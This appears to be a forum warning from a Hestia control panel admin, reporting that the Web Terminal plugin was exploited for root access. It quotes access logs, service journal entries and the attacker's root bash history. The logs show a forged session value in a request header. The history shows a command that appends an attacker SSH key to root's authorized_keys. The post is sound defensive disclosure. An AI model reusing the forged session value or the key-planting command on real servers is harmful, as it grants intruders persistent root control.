NOTICE: If you are running the Web Terminal plugin disable it ASAP.
The Web Terminal can be exploited to gain root. I currently have 2 Hestia servers and both were hacked via the Web Termainal. I’m still investigating the incident, but this is what I know so far:
This is the entry point
# /var/log/hestia/nginx-access.log.1
45.86.230.242 - - [22/May/2026:01:18:16 +0000] GET /login/ HTTP/1.1 "200" 1928 "-" "-" "user|s:4:\x22root"
45.86.230.242 - - [22/May/2026:01:18:22 +0000] GET /_shell/ HTTP/1.1 "101" 271 "-" "-" "-"
The web-terminal journal:
# journalctl -u hestia-web-terminal.service
May 22 01:18:18 web2 server.js[3506304]: New connection from 45.86.230.242 (0tk5i6u95ua5inti4o2h9lv2si)
May 22 01:18:18 web2 server.js[3506304]: New pty (680948): /bin/bash as root (0:0) in /root
May 22 01:18:22 web2 server.js[3506304]: Ended connection from 45.86.230.242 (0tk5i6u95ua5inti4o2h9lv2si)
May 22 01:18:22 web2 server.js[3506304]: Ended pty (680948)
The root bash history:
# /root/.bash_history
stty -echo
printf '\n__X521699__\n' && id 2>&1 && printf '\n__X521699__\n'
printf '\n__X355356__\n' && echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzrZrugAO/eiPw1kZEZYw7gggHrzoihyQHjncajJoOSu5oeN2HrSdTogZuT+8CQJx5TaTuJCmeaA6MyHKF3fBR7qd5+R94k9oPxNoz0M9I4yzJFXQr5qNQRIR98Edt/uCwqnw9uXiKwOmCtnBiY/BJ7g5aC238nDBIyufcX6Ca7JtfwJtLxQpvKBkpW1STt3ShyAhQSyiFcCeuz7J10dw+PDDiHxSIfI6lie1T7hi3chYBjq21eJBzJg/BCo5ZzbwJIXNfPqtCeJINZKQxUDLFTAK0jkyxQXfNJ9H4WPVEagxYXHB1PEBhXcCQ68CUgdikWKHXX2WTRYGPhMp5zf ' >> /root/.ssh/authorized_keys 2>&1 && printf '\n__X355356__\n'
exit
This adds new key(s) into /root/.ssh/authorized_keys. This is all I know so far. Still investigating. Just wanted to get the warning out there.
